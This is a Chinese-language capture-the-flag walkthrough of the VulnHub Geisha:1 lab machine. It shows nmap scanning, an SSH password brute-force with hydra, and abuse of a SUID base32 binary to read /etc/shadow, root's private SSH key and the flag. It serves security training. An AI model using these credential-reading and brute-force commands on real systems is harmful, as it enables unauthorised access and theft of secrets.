vulnhub:Geisha:1 靶机练习

下载地址: https://www.vulnhub.com/entry/geisha-1,481/

目标是获得root shell，然后在/root下获得flag。

 

环境

    kali linux + vmware 15.5.0

 

1、使用下面命令来发现靶机地址:

  arp-scan -l

    

2、nmap扫描开放的端口，服务等信息

nmap -sS -A -O -p- -v 172.168.10.244

3、80端口是开着的，浏览一下页面：

 

利用

    根据nmap的扫描结果，看到有22端口，ssh服务，试着看看能不能找到用户名和密码来通过ssh连接靶机。假如用户名是geisha，用hydra破解密码试试。

hydra -l geisha -P /usr/share/wordlists/rockyou.tx 172.168.10.244 ssh

    为geisha用户得到了一个letmein的密码

    尝试使用用户名geisha，密码letmein，登录，可以成功登录：

ssh geisha@172.168.10.244

    当然不是root权限，现在开始提权操作，在当前目录中，先枚举并查看有哪些有价值的数据。这里有一些具有suid权限的文件。使用下面的命令，我们可以检查机器中的suid权限。

find / -perm -u=s -type f 2>/dev/null

    此处发现/usr/bin/base32文件它有suid权限。通过使用base32文件来检查权限升级。

    现在，使用/ base32命令检查/ etc / shadow文件以读取受限制的文件。

base32 "/etc/shadow" | base32 --decode

    此处在/etc /shadow文件中获得了哈希密码，并尝试了多次破解，未成功，所以此方法无法获取root用户的密码。

    现在尝试使用ssh进行root登录，为此，需要使用ssh复制登录的私钥。

    

    通过使用以下命令，获得了root的ssh私钥。

base32 "/root/.ssh/id_rsa" | base32 --decode

    在这里，成功得到了ssh密钥，现在将该密钥保存在自己的系统中。得到了root的ssh私钥。使用这个私有ssh密钥，把用户geisha切换到root。

ssh -i key root@172.168.10.244

    获得flag：

    查找root flag的另一种方法是，在geisha连接的ssh中输入如下语句，即可通过base32直接读取受限制的文件。(个人认为使用这种方法的前提是，知道flag在root家目录下，并且文件名称是flag.txt)

base32 "/root/flag.txt" | base32 --decode